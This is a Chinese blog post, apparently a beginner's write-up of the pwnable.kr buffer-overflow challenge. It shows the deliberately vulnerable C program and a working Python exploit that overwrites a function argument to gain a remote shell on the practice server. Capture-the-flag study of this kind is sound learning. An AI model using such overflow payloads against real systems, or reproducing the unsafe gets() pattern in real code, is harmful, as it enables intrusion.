pwn学习之路

最新推荐文章于 2024-05-13 10:09:48 发布
最新推荐文章于 2024-05-13 10:09:48 发布
阅读量2.9k 收藏 9
点赞数 2
分类专栏: 逆向 pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35396598/article/details/79954190
版权
pwn 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
逆向
5 篇文章 0 订阅
订阅专栏

最近也开始学习pwn了。。。网站平台是http://pwnable.kr/play.php

网址是http://pwnable.kr/play.php

第三题,代码如下

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

显然是要覆盖。。。

下载了他的文件,然后IDA打开,


arg_0的参数是8字节,按照图一里,就是0x2C+8=44+8=52

所以需要覆盖52位

然后写python代码,这里要感谢giantbranch大大,我是按照他的博客,一步步开始学习,他的博客是https://blog.csdn.net/u012763794/article/details/51992512


我也自己做了点测试。

代码如下

# -*-coding:utf8 -*-
import socket
import telnetlib
import struct
# 将32位的整数转化为字符串(小端模式)
def p32(val):
    # <:小端模式  L:unsigned long
    return struct.pack("<L", val)
def pwn():
    '''
     ####cmp     [ebp+arg_0], 0CAFEBABEh
     ####这里 ebp是44,args_0是8,所以地址是52

    char s; // [sp+1Ch] [bp-2Ch]@1
    overflowme的基址为ebp-0x2c,即44个字节,再加上  ebp  和   返回地址  的8个字节就是52个字节,最后的4个字节覆盖就可以了
    '''
    # 创建一个TCP socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 连接服务器的9000端口(接收的参数是一个元组)
    s.connect(("pwnable.kr", 9000))
    # 目标被填充的地址
    target_addr = p32(0xcafebabe)
    #本来的bp地址是 44+4(bp)+4(返回地址)==52
    ### 所以需要先覆盖52位,没有了返回

    ###我试着改为56,然后溢出了,溢出保护,导致终止了
    ###小于52,则没有覆盖
    # 构造payload,52长度
    payload = '1' * 52 + target_addr
    print payload
    # 向服务器发送数据
    s.sendall(payload + '\n')
    # 创建一个telnet来产生一个控制服务器的shell
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()
pwn()

pycharm里开始运行,然后就可以发现建立了shell

输入ls


飞花念惜
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
PWN练习网站
GJQI12的专栏
04-10 2123
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWNPWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
探索Wi-PWN:开启智能Wi-Fi攻击防御新纪元
最新发布
gitblog_00068的博客
05-13 416
探索Wi-PWN:开启智能Wi-Fi攻击防御新纪元 项目地址:https://gitcode.com/samdenty/Wi-PWN 项目介绍 Wi-PWN是一个强大的开源项目,旨在为ESP8266微控制器提供固件,以执行便捷的无线网络去认证攻击(Deauthentication Attack)。它的设计既简单易用,又兼顾了功能的强大性,通过材料低廉的Arduino板,就可以对Wi-Fi安全进行深...
pwn学习(一)
qq_37439229的博客
10-01 466
已经大二上了,一直在划水,要重新开始学习了 我要做到不打比赛时看书,打比赛写wp,太懒了 32位传参,返回地址,另一个返回地址,参数,压栈 64位传参,gcc 寄存器 rdi rsi dx rcx r8 r9(参数),返回地址(压栈) (1)栈溢出 basic_rop 1.ret2text 这个比较弱智,自带system(’/bin/sh’),只要改一下返回地址就行 2,ret2shellcode 这种的话用pwntool自带的shellcraft,sh()构造放在bss段或者栈上就行了,比较简单 3.re
各网站pwn学习资料大全
Sakura给爷pwn全场
12-15 680
语雀: https://www.yuque.com/u239977/cbzkn3/xz7ecz https://www.yuque.com/hxfqg9/bin/hg3qeh CTF wiki: https://wiki.x10sec.org/ i春秋CTF入门: https://www.cnblogs.com/ichunqiu/p/11583552.html
pwn学习入门教程(一)
StevenOnesir的博客
11-24 2859
写这个系列的文章是因为想系统回顾之前学过的ctf知识,也希望引领更多人入门。 1. 对pwn的理解 pwn是ctf的一种题型,主要是利用程序中的漏洞造成内存破坏以获取远程计算机的shell,从而获得flag。对面服务器运行的更多是C/C++语言编写的程序,而我们通过网络与服务器进行数据交互,我们可以构造恶意数据发送给服务器,导致服务器执行恶意代码,从而远程控制服务器。 个人感觉逆向工程是pwn的基础,两者极其类似。学习pwn的门槛比web高很多,所以更需要长期的钻研与学习。 2、pwn入门学习的几点建议 首
Pwn学习线及学习笔记以及gem安装
10-15
《汇编语言》是Pwn学习的必备知识之一。作者建议从王爽老师的《汇编语言》开始,通过学习汇编语言来了解计算机内部的运行机理。汇编语言可以使大家更加深入地了解计算机内部到底是怎样运行的,并且可以学习到很多有...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
PWN】二进制基础
weixin_38835814的博客
08-28 1261
CTF越来越火,没想到我们单位也组织战队参赛,可惜的是PWN学习径过于陡峭,短期又看不到成绩,此位空缺。想到大学时跟着台湾ROCK老师搞过一阵逆向,兴趣也有,决定从头复习一遍,谁叫我们大学那会没有CTF这种东西呢。以下内容为本人的学习笔记,边学边记录,不对的地方欢迎大家指正。提示:本内容仅供技术交流,不可用于违法用途。......
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN学习,是入门指导。
pwn学习(1)
weixin_33979745的博客
04-25 343
0x00 简介 入职之后,公司发布任务主搞pwn和re方向,re之前还有一定的了解,pwn我可真是个弟弟,百度了一番找到了蒸米大佬的帖子,现在开始学习。 0x01 保护方式 NX (DEP):堆栈不可执行 ASLR:内存地址随机化,在linux和pie相结合,aslr是系统是否开启,有0.1.2三个等级,而pie是程序自身是否开启,两者共同作用有不同的效果,如下图。 Canary(GS):...
pwn学习资源
SkYe's Blog
07-28 344
pwn学习资源 原文链接:https://www.jianshu.com/p/a955ff04534e 学习学习各种套 写有漏洞的程序 -> pwn CTF练习网站: http://pwnable.kr https://pwnable.tw https://www.jarvisoj.com https://github.com/ctfs Wargames ROP Empo...
PWN入门系列教程~(1)
小心信科理化声
11-30 7314
PWN入门系列教程~(1)前言关于我的故事先来说下学习线大致分为以下几个部分那么什么是PWN呢?栈函数调用栈寄存器函数调用栈的经典内存布局 前言 关于我的故事 博主是一名20级在校大学生,平常热爱网络安全。喜欢打CTF,但是自己所在的学校里并没有人去担任PWN的工作,身为会长的我自来要挑起重担了,在跟几位有联系的PWN佬交流后明确了自己的要学pwn。 先来说下学习线 大致分为以下几个部分 学习基础:去学习一些基本的原理 学习真实漏洞 编写exp FUZZ 那么什么是PWN呢? 来说下pwn的来源:
pwn入门的一些学习资料
SkYe's Blog
07-28 1595
pwn入门的一些学习资料 原文链接:https://www.jianshu.com/p/7133863623e6 总结记录一下pwn入门的一些学习资料 pwn入门学习的网站: CTF Wiki 必备技能: 汇编语言 要搞pwn首先要懂汇编吧,毕竟是搞二进制的 建议看王爽写的那本汇编语言,将书本的实验做一遍,然后再了解一下AT&T和intel两种汇编代码风格有什么不同 可以看下这篇博客...
专注CTF Pwn的著作终于来了!从此悟透各类漏洞利用技术
博文视点(北京)官方博客
12-30 1090
- 做开发要刷Leetcode - - 搞安全要打CTF - CTF(Capture The Flag)中文一般译作夺旗赛,通俗来讲,就是模拟“黑客”所使用的技术、工具、方法等手段发展出来的网络安全竞赛。近年,国内外各类高质量的CTF竞赛层出不穷,CTF已经成为学习、提升信息安全技术,展现安全能力和水平的绝佳平台。 CTF赛题涉及的非常领域广,市面上相关书籍还停留在知识广度上的覆盖,但CTF模块间的发展程度参差不齐,始终缺少能够深入介绍单一领域的内容,尤其是Pwn方向! 而Pwn...
pwn(究极入门)
热门推荐
sjt670994562的博客
08-01 1万+
不能说是逆向转pwn吧,主要是想拓展一下,这两者之间的关系也挺大的 1.攻防世界-when_did_you_born 除去连上就有flag,这个应该就是最简单的题目了吧 惯例,checksec,这里有四种保护机制,有大佬的链接,这个要弄很清楚,尤其是PIE,以后慢慢来吧 https://www.jianshu.com/p/8a9ef7205632 没有PIE和FORTIFY(这边作者也不是太懂,...
Nepire的pwn入门学习之旅——(一)
Nepire的博客
02-03 2146
欢迎大家来到Nepire的pwn入门,本系列主要是通过CTF中pwn题的各种类型的解题过程来学习pwn相关的知识,让我们在pwn的世界沦陷吧呜喵~ 这次我要讲的是南邮CTF里的pwn50—When did you born?这是我最初做出来的几题pwn之一,算是很基础的pwn题,,所以让我们从这题开始入门吧~ 题目 nc ctf.acdxvfsvd.net 1926 ...
学习pwn需要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值